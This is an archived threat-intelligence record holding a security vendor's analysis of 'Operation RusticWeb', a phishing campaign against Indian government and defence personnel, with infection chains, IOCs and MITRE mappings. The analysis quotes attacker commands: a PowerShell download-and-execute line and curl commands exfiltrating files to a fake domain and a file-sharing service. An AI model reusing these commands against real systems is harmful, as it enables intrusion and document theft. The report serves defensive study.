{ "id": "abdba514-88e3-4c12-b5ca-2bde8939f899", "created_at": "2026-04-06T00:10:37.59317Z", "updated_at": "2026-04-10T13:12:43.601863Z", "deleted_at": null, "sha1_hash": "9ed5aee4102687b649fd6b8fb7126e98a9872da0", "title": "Operation RusticWeb targets Indian Govt: From Rust-based malware to Web-service exfiltration", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3682085, "plain_text": "Operation RusticWeb targets Indian Govt: From Rust-based\r\nmalware to Web-service exfiltration\r\nBy Sathwik Ram Prakki\r\nPublished: 2023-12-21 · Archived: 2026-04-05 20:13:17 UTC\r\nSEQRITE Labs APT-Team has uncovered a phishing campaign targeting various Indian government personnel\r\nsince October 2023. We have also identified targeting of both government and private entities in the defence sector\r\nover December. New Rust-based payloads and encrypted PowerShell commands have been utilized to\r\nexfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2)\r\nserver. With actively modifying its arsenal, it has also used fake domains to host malicious payloads and decoy\r\nfiles. Below are few names of domains and sample baits used in this campaign:\r\nIPR form of Department of Personnel \u0026 Training, specific to IAS officers\r\nFake domain mimicking Army Welfare Education Society (AWES)\r\nStats report of Assam CDR by Kailash Satyarthi Children’s Foundation\r\nAnother fake domain mimicking Parichay, a Government SSO platform\r\nNomination form for Defence Services Officers Provident (DSOP) Fund\r\nPresentation on the quarterly brief of initiatives with the Ministry of Defence\r\nThis campaign is tracked as Operation RusticWeb, where multiple TTPs overlap with Pakistan-linked APT groups\r\n– Transparent Tribe (APT36) and SideCopy. It also has similarities with Operation Armor Piercer report released\r\nby Cisco in 2021, and the targeting with the ESSA scholarship form of AWES was observed by our team back in\r\nthe same year.\r\nThreat actors have begun moving from well-known compiled languages to newer ones like Golang, Rust, and\r\nNim. This provides cross-compatibility and also makes detection difficult at the same time. Recent examples of\r\nGolang malware analyzed by our team are the Windows-based Warp malware ecosystem that uses a Telegram bot\r\nas C2 and a Linux-based stager payload of Ares RAT. At the same time, various ransomware (RaaS) operators\r\nhave migrated from Golang to Rust as it provides high-performance encryption and evasion speed while ensuring\r\nmemory safety.\r\nInfection Chain 1\r\nThe first infection observed heavily relies on Rust-based payloads that are used for enumerating the file system. A\r\nmalicious shortcut file starts an infection where a fake domain of AWES is utilized to drop these payloads and\r\nexfiltrate data to a file sharing web-service.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 1 of 25\n\nFig. 1 – Infection Chain (1)\r\nThe attacker targets the victim via spear-phishing leading to an archive file named “IPR_2023-24”. This contains a\r\nWindows shortcut file masquerading as a PDF file using a double extension format. The comment name suggests\r\nthe bait to be a form related to IPR.\r\nFig. 2 – Malicious Shortcut file\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 2 of 25\n\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep Bypass -nop -c “iwr\r\n‘hxxps://rb[.]gy/gbfsi’ -OutFile $env:USERPROFILE\\Documents\\file.ps1; \u0026\r\n$env:USERPROFILE\\Documents\\file.ps1”\r\nOpening this triggers PowerShell to download and execute a script from the rb[.]gy domain, a free URL shortener.\r\nCommand-line parameters to bypass the execution policy with no profile are used to download the PS1 script\r\nusing Invoke-WebRequest.\r\nVictimology\r\nBased on the shortened URL, we can check the stats for a number of clicks and the country where the click has\r\noriginated using their tracker. The campaign went live at the end of September and a lot of activity can be seen in\r\nOctober, with 26.53% of them being from India alone. This doesn’t account for confirmed victimology but gives\r\nan overview of the targeted victim.\r\nFig. 3 – Victimology\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 3 of 25\n\nPowerShell Stage\r\nThe expanded URL points to a domain named awesscholarship[.]in to fetch and save the PowerShell script\r\n(file.ps1) in the Documents folder. Before checking out this script, the domain name looks like a scholarship for\r\n“Army Welfare Education Society”. The legitimate domain for this organization is scholarship[.]awesindia[.]com,\r\nwhere similar phishing campaigns have been observed in the past. Opening this fake domain page redirects it to\r\nthe official AWES page showing an official alert notice as shown below.\r\nFig. 4 – Official notice of fake website\r\nPowerShell script begins with setting up URL paths for downloading the subsequent stage payloads along with the\r\nlure document. Target paths for downloading and uploading files are set up, where three functions are defined\r\nprimarily for those features.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 4 of 25\n\nFig. 5 – PowerShell script\r\nThe X and Y functions are used to log messages to a file and download a file from the given URL to the target\r\npath \u0026 log it, respectively. The target location is the default Documents directory where a new folder named\r\nDownloads is created to drop the decoy PDF file and an archive beside the folder.\r\nFig. 6 – PowerShell script (contd.)\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 5 of 25\n\nOnce the decoy is opened, the archive file is extracted which contains a single file without any extension. This is\r\nrenamed to add the EXE extension and executed. Lastly, the Z function is used to upload the log file to server\r\nusing curl command and then delete the logs recorded.\r\nFig. 7 – Log file uploaded\r\nMeanwhile, the decoy file opened is a form for a statement of Immovable Property Return where the service is\r\nmentioned as ‘Indian Administrative Service’. Multiple similar forms on various Indian government portals are\r\navailable in the public domain. However, this blank IPR form is available on DoPT’s (Department of Personnel \u0026\r\nTraining) website that falls under India’s Ministry of Personnel Public Grievances and Pensions. Note that this is\r\nnowhere related to the ESSA – Education scholarship scheme of the Army Personal application form.\r\nFig. 8 – Decoy: IPR form for IAS officers (Oct’23)\r\nDownloader: System Check Stage\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 6 of 25\n\nThe EXE payload turns out to be a Rust-compiled binary that checks basic system information as found in the\r\nPDB path – ‘syscheck.pdb’. After demangling the Rust function names using an IDA Pro plugin, we can see a lot\r\nof write and command execute functions being called. It retrieves information by using:\r\nDomain ifconfig[.]me to fetch the IP address\r\nA WMIC command to fetch active drives present on the victim system – “wmic logicaldisk get caption”.\r\nFig. 9 – System check logs\r\nThese logs are written into a file named ‘MySystem.txt’ in ProgramData\\syscheck directory and uploaded to the\r\nsame domain as:\r\n“curl -F TT=@C:\\ProgramData\\syscheck\\MySystem.txt hxxps://awesscholarship[.in/upload/upload.php” \r\nFig. 10 – URL to download the next stage\r\nThen another archive named file1.zip is downloaded from the same fake domain and extracted. It is renamed to\r\n‘MySystem.exe’ and executed. Lastly, persistence for this final payload is created through the Startup directory.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 7 of 25\n\nFig. 11 – Persistence via Startup\r\nStealer: Final Stage\r\nThe final payload is another rust-based malware that steals files, collects system name \u0026 IP, and uploads\r\nindividual files along with the logs. It doesn’t have built-in features of sophisticated info-stealers like stealing\r\nfrom web browsers, Discord/Steam or cryptocurrency wallets. Multiple versions of this stealer were found in this\r\ncampaign with compilation timestamps ranging from September till date (December) and they have had a\r\nsignificantly lower detection rate on Virus Total.\r\nMD5 Compilation Timestamp PDB\r\nda745b60b5ef5b4881c6bc4b7a48d784 2023-09-26 syscheck.pdb\r\nf68b17f1261aaa4460d759d95124fbd4 2023-09-26 alam.pdb\r\n237961bbba6d4aa2e0fae720d4ece439 2023-10-26 alam.pdb\r\nd2949a3c4496cb2b4d204b75e24390d9 2023-12-08 Zew.pdb\r\nfc61b985d8c590860f397d943131bfb5 2023-12-11 Zew.pdb\r\nChanges in PDB path name can be seen in October and December samples but the similarity is almost identical\r\nwhen compared via BinDiff, which is 91%, except for few minor changes.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 8 of 25\n\nFig. 12 – Similarity in samples\r\nIt enumerates all document and archive files in all the drives it fetched previously in the downloader stage. Two\r\nlog files are created inside a new folder with different names (Micro, File) for each sample under the\r\nProgramData directory. They are used to store records of uploaded files and logs of enumerated files. After saving\r\nenumerated files to ‘Logs.txt,’ each file is uploaded via the curl PUT method to oshi[.]at domain, an anonymous\r\npublic file-sharing engine called OshiUpload.\r\n“curl -T C:\\Users\\test\\Downloads\\\u003cfilename\u003e.zip hxxps://oshi[.]at” \r\nAlong with the desktop name, the links to download these files are saved in ‘Records.txt,’ which contains three\r\nURLs for each file. Two are Clearnet links – one for managing and the other for downloading. The third is a Tor\r\ndomain of Oshi to download via hidden service.\r\nFig. 13 – Download links of uploaded files\r\nThe management page displays the attributes of the file uploaded – download links, size, type, hash, and\r\ntimestamp. Options for destroying the file along with an expiration timer are present.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 9 of 25\n\nFig. 14 – Management page for uploaded files\r\nThe log files with timestamps in the filename are uploaded to the fake AWES domain. The server response is\r\nverified for a successful upload, after which it goes into an infinite sleep until interrupted.\r\nFig. 15 – Server response after uploading logs\r\nWith the new stealer payloads that we observed in December, the threat actor utilizes a new bait document that\r\nbelongs to Kailash Satyarthi Children’s Foundation. The document is available on their website, which is related\r\nto their statistics report on “Child Marriage and other crimes against Children in Assam”.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 10 of 25\n\nFig. 16 – Decoy: Assam CDR (Dec’23)\r\nUsing decoys themed as children’s foundations or societies for army children and IAS officers in a spear-phishing\r\ncampaign indicates a targeted effort aimed at Indian government officials, especially those associated with\r\nchildren’s foundations or societies.\r\nInfection Chain 2\r\nAnother similar infection chain was observed in December using maldocs, where enumeration and exfiltration\r\nwere done using PowerShell script instead of Rust-based payloads. Along with two fake domains, encrypted\r\nPowerShell scripts have been used here.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 11 of 25\n\nFig. 17 – Infection Chain (2)\r\nThe infection starts with a phishing maldoc that contains malicious VBA macro. With basic VBA obfuscation, it\r\ncontains encrypted PowerShell commands. Similar maldocs have been identified that use slightly modified PS\r\ncommands.\r\n1. Dsop_Nom.ppam\r\n2. DSOP-NOM.ppam\r\n3. PM_INDIG_INITIATIVE_BRIEF.ppam\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 12 of 25\n\nFig. 18 – Malicious VBA macro\r\nEncrypted PowerShell\r\nOnce the document is opened, it converts the numbers to characters forming ‘PoWeRSHEll’. The PowerShell\r\ncommand contains encrypted data, which is converted to a SecureString using ‘ConvertTo-SecureString‘ with a\r\nkey. This follows a similar way of PowerShell decryption seen in Emotet but with slightly additional obfuscation.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 13 of 25\n\nFig. 19 – Encrypted and Obfuscated PowerShell commands\r\nIn the first maldoc, the converted string uses the Marshal object for memory managing the decryption via built-in\r\nDPAPI to invoke the commands using SecureStringToGlobalAllocUnicode method. The second one uses the\r\nPSCredentials object to get a plain-text string. In the final one, PtrToStringBSTR and SecureStringToBSTR are\r\nused with the Marshal object. For obfuscation, the commands use techniques from Invoke-Obfuscation to mask\r\nthe trigger of the IEX command using environment variables:\r\nFig. 20 – Obfuscated IEX command\r\nLooking at the wholly decrypted PowerShell commands, it downloads the decoy file and the next-stage\r\nPowerShell script. They are downloaded from the domains into the Downloads and Documents directories and\r\nexecuted.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 14 of 25\n\nFig. 21 – Decoded commands (1)\r\n \r\nFig. 22 – Decoded commands (2)\r\nDomains and Decoys\r\nThe first scenario downloads from the domain ‘parichay.epar[.]in,’ whereas the second one uses the same fake\r\ndomain of AWES observed in the first infection chain. This is another fake domain used to host malicious\r\npayloads, which mimics the official government website ‘parichay.nic[.]in’. It is a Government SSO platform\r\ndesigned to onboard the users under a single authentication framework. While Parichay authorizes government\r\nemployees to access various NIC services based on “user department” and the Government eMail address\r\n(@nic.in/@gov.in), Jan Parichay authorizes citizens to access citizen-centric services.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 15 of 25\n\nFig. 23 – Legitimate and fake Parichay domains\r\nThe first decoy pertains to the DSOP (Defence Services Officers Provident) Fund nomination form, which deals\r\nwith the Defence Accounts Department. The second decoy is related to a presentation on a quarterly brief with the\r\nMinistry of Defence.\r\nFig. 24 – Decoy: Defence Services Officers Provident (DSOP) Fund\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 16 of 25\n\nFig. 25 – Decoy: Ministry of Defence\r\nThe next-stage PowerShell script ‘Mail_check.ps1’ dropped is encrypted and obfuscated similarly. Looking at the\r\ndecrypted script, it starts by downloading and extracting an archive file, which contains a payload named\r\n‘syscheck.exe.’ It is extracted directly to the Startup folder to establish persistence for this payload.\r\nFig. 26 – Dropped PowerShell script after decryption\r\nEnumerate and Exfiltrate\r\nThe binary is another Rust-based payload with a different PDB name, ‘Aplet.pdb.’ It has a compiler timestamp of\r\nDec 14 and has the name of Cisco’s AnyConnect Web Helper with a signed certificate.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 17 of 25\n\nFig. 27 – Binary with WebHelper Certificate\r\nInstead of performing the enumeration \u0026 exfiltration directly, this drops a PowerShell script ‘sys.ps1’ into the\r\nPictures directory for this purpose after fetching the username. The command triggered is:\r\n“powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Users\\test\\Pictures\\sys.ps1”\r\nIt excludes 3 folders during enumeration: Windows and both the ‘Program Files’ directories. Only 13 filetypes are\r\nshortlisted: (‘.ppt’, ‘.pptx’, ‘.pdf’, ‘.xlsx’, ‘.xlsm’, ‘.xls’, ‘.xlam’, ‘.doc’, ‘.docx’, ‘.docm’, ‘.txt’, ‘.dot’,\r\n‘.ppam’) and each file is logged to ‘paths.txt’ in Documents folder.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 18 of 25\n\nFig. 28 – Enumeration \u0026 Exfiltration\r\nOnce it is uploaded to oshi[.]at, the download URLs are saved to ‘suc_logs.txt’ similar to campaign 1. This script\r\nruns in an infinite loop to check if any new files have been created. These URL logs are periodically uploaded\r\nafter a specific duration.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 19 of 25\n\nFig. 29 – Uploading logs\r\nMeanwhile, the parent binary (syscheck) goes into infinite sleep unless interrupted. If so, instead of exiting, it\r\nuploads the URL logs to Oshi again. Additionally, it also uploads to a sub-domain of firebaseio as a backup\r\nmeasure this time.\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 20 of 25\n\nFig. 30 – Uploading to Firebaseio with authentication\r\nThe Firebase Realtime Database is a cloud-hosted NoSQL database that can store and sync data in real-time. It is\r\nan open platform by Google that is widely used for cloud-based applications by developers and has attracted threat\r\nactors to deploy malware like Unlucky Kamran to exfiltrate data. It provides several features like cloud storage,\r\nhosting, real-time database, and more.\r\nConclusion\r\nA new phishing campaign is targeting various Indian government personnel to steal confidential documents. Rust-based payloads and encrypted PowerShell scripts have been deployed to enumerate and exfiltrate documents to an\r\nanonymous public file-sharing engine called OshiUpload instead of a dedicated command-and-control (C2)\r\nserver. Both fake domains that mimic government entities have been used to host malicious payloads in this cyber-espionage attack. Operation RusticWeb could be linked to an APT threat as it shares similarities with various\r\nPakistan-linked groups. As threat actors shift to malware developed using newly compiled languages like Golang,\r\nRust, and Nim, we recommend proceeding with caution and taking necessary precautions to stay protected.\r\nSEQRITE Protection\r\nLnk.Stealer.48397\r\nPS.Stealer.48398\r\nRustStealer.48408.GC\r\nScript.RustStealer.48409\r\nTrojan.Ruststealer\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Name\r\nResource Development\r\nT1583.001\r\nT1587.001\r\nT1588.002\r\nT1608.001\r\nT1608.005\r\nAcquire Infrastructure: Domains\r\nDevelop Capabilities: Malware\r\nObtain Capabilities: Tool\r\nStage Capabilities: Upload Malware\r\nStage Capabilities: Link Target\r\nInitial Access T1566.002 Phishing: Spear phishing Link\r\nExecution T1106\r\nT1129\r\nT1059\r\nNative API\r\nShared Modules\r\nCommand and Scripting Interpreter\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 21 of 25\n\nT1047\r\nT1204.002\r\nWindows Management Instrumentation\r\nUser Execution: Malicious File\r\nPersistence T1547.001 Registry Run Keys / Startup Folder\r\nDefense Evasion\r\nT1027.010\r\nT1036.007\r\nT1140\r\nCommand Obfuscation\r\nMasquerading: Double File Extension\r\nDeobfuscate/Decode Files or Information\r\nDiscovery\r\nT1016\r\nT1033\r\nT1083\r\nSystem Network Configuration Discovery\r\nSystem Owner/User Discovery\r\nFile and Directory Discovery\r\nCollection\r\nT1005\r\nT1119\r\nData from Local System\r\nAutomated Collection\r\nCommand and Control T1105 Ingress Tool Transfer\r\nExfiltration\r\nT1020\r\nT1567\r\nAutomated Exfiltration\r\nExfiltration Over Web Service\r\nIOCs\r\nMD5 Filename\r\n56cb95b63162d0dfceb30100ded1131a IPR_2023-24.pdf.zip\r\n13ee4bd10f05ee0499e18de68b3ea4d5 IPR_2023-24.pdf.lnk\r\nde30abf093bd4dfe6b660079751951c6 DSOP-NOM.ppam\r\nPowerShell\r\nc9969ece7bb47efac4b3b04cdc1538e5 in.ps1\r\nf14e778f4d22df275c817ac3014873dc In.ps1\r\n501a6d48fd8f80a134cf71db3804cf95 Mail_check.ps1\r\n6d29fc0a73096433ff9449c4bbc4cccc sys.ps1\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 22 of 25\n\nDecoys\r\na9182c812c7f7d3e505677a57c8a353b Ipr.pdf\r\nf5d8664cbf4a9e154d4a888e4384cb1d abc009.pdf\r\n3ce8dfb3f1bff805cb6b85a9e950b3a2 1.pdf\r\na696c50dd5d15ba75c9e7f8d3c64997c 1.pdf\r\nArchive\r\ne0102071722a87f119b12434ae651b48\r\nee8d767069faf558886f1163a92e4009\r\n9f3359ae571c247a8be28c0684678304\r\nb0b6629d35451bcc511c0f2845934c3e\r\nf2501e8b57486c427579eeda20b729fd\r\n20b4eb5787faa00474f7d27c0fea1e4b\r\n635864ff270cf8e366a7747fb5996766\r\nEXE\r\nda745b60b5ef5b4881c6bc4b7a48d784\r\nf68b17f1261aaa4460d759d95124fbd4\r\n237961bbba6d4aa2e0fae720d4ece439\r\nd2949a3c4496cb2b4d204b75e24390d9\r\nfc61b985d8c590860f397d943131bfb5\r\n04557782d7017f18ec059fc96d7f2dc8\r\nDomain/IP\r\nawesscholarship[.]in\r\n89.117.188[.]126 \r\nparichay.epar[.]in\r\n13.232.102[.]189 \r\noshi[.]at\r\nalfa-aeafa-default-rtdb.firebaseio[.]com\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 23 of 25\n\nURLs\r\nhxxps://rb[.]gy/gbfsi\r\nhxxps://awesscholarship[.]in/upload/file.zip\r\nhxxps://awesscholarship[.]in/upload/file1.zip\r\nhxxps://awesscholarship[.]in/upload/in.ps1\r\nhxxps://awesscholarship[.]in/upload/upload.php\r\nhxxps://awesscholarship[.]in/upload/Ipr.pdf\r\nhxxps://awesscholarship[.]in/upload/abc009.pdf\r\nhxxps://awesscholarship[.]in/upload/1.pdf\r\nhxxps://awesscholarship[.]in/upload/DSOP-NOM.zip\r\nhxxps://awesscholarship[.]in/ppam/Mail_Check.ps1\r\nhxxps://awesscholarship[.]in/ppam/syscheck.zip\r\nhxxps://parichay.epar[.]in/Win/1.pdf\r\nhxxps://parichay.epar[.]in/Win/Mail_Check.ps1\r\nPDB\r\nC:\\Users\\123\\Desktop\\Syscheck\\target\\release\\deps\\syscheck.pdb\r\nC:\\Users\\123\\Desktop\\Alam\\target\\release\\deps\\alam.pdb\r\nC:\\Users\\123\\Desktop\\Aplet\\target\\release\\deps\\Aplet.pdb\r\nD:\\HOME\\DESKTOP NEW DATA\\Zew\\target\\release\\deps\\Zew.pdb\r\nHost\r\nC:\\ProgramData\\syscheck\\file.zip\r\nC:\\ProgramData\\syscheck\\MySystem.exe\r\nC:\\ProgramData\\syscheck\\MySystem.txt\r\nC:\\ProgramData\\Micro\\logs.txt\r\nC:\\ProgramData\\Micro\\records.txt\r\nC:\\ProgramData\\Files\\Log.txt\r\nC:\\ProgramData\\Files\\Records.txt\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 24 of 25\n\nDocuments\\downloadAndExecuteLog.txt\r\nDocuments\\file.ps1\r\nDocuments\\myfile.zip\r\nDocuments\\unzippedFolder\\file.exe\r\nDocuments\\Downloads\\myfile.pdf\r\nDocuments\\paths.txt\r\nDocuments\\suc_logs.txt\r\nDocuments\\Mail_Check.ps1\r\nDocuments\\syscheck.zip\r\nDownloads\\1.pdf\r\nPictures\\sys.ps1\r\n%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MySystem.exe\r\n%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\syscheck.exe\r\nAuthor: Sathwik Ram Prakki\r\nSource: https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nhttps://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/\r\nPage 25 of 25", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/" ], "report_names": [ "operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "403c7091-ccdd-4a76-94ad-27eb61449336", "created_at": "2024-01-18T02:02:34.407633Z", "updated_at": "2026-04-10T02:00:04.829369Z", "deleted_at": null, "main_name": "Operation RusticWeb", "aliases": [], "source_name": "ETDA:Operation RusticWeb", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b01b0683-5c7c-4070-ba0c-4fdede370995", "created_at": "2022-10-25T16:07:23.925692Z", "updated_at": "2026-04-10T02:00:04.79318Z", "deleted_at": null, "main_name": "Operation Armor Piercer", "aliases": [], "source_name": "ETDA:Operation Armor Piercer", "tools": [ "NetWeird", "NetWire", "NetWire RAT", "NetWire RC", "NetWired RC", "Recam", "Warzone", "Warzone RAT" ], "source_id": "ETDA", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434237, "ts_updated_at": 1775826763, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9ed5aee4102687b649fd6b8fb7126e98a9872da0.pdf", "text": "https://archive.orkl.eu/9ed5aee4102687b649fd6b8fb7126e98a9872da0.txt", "img": "https://archive.orkl.eu/9ed5aee4102687b649fd6b8fb7126e98a9872da0.jpg" } }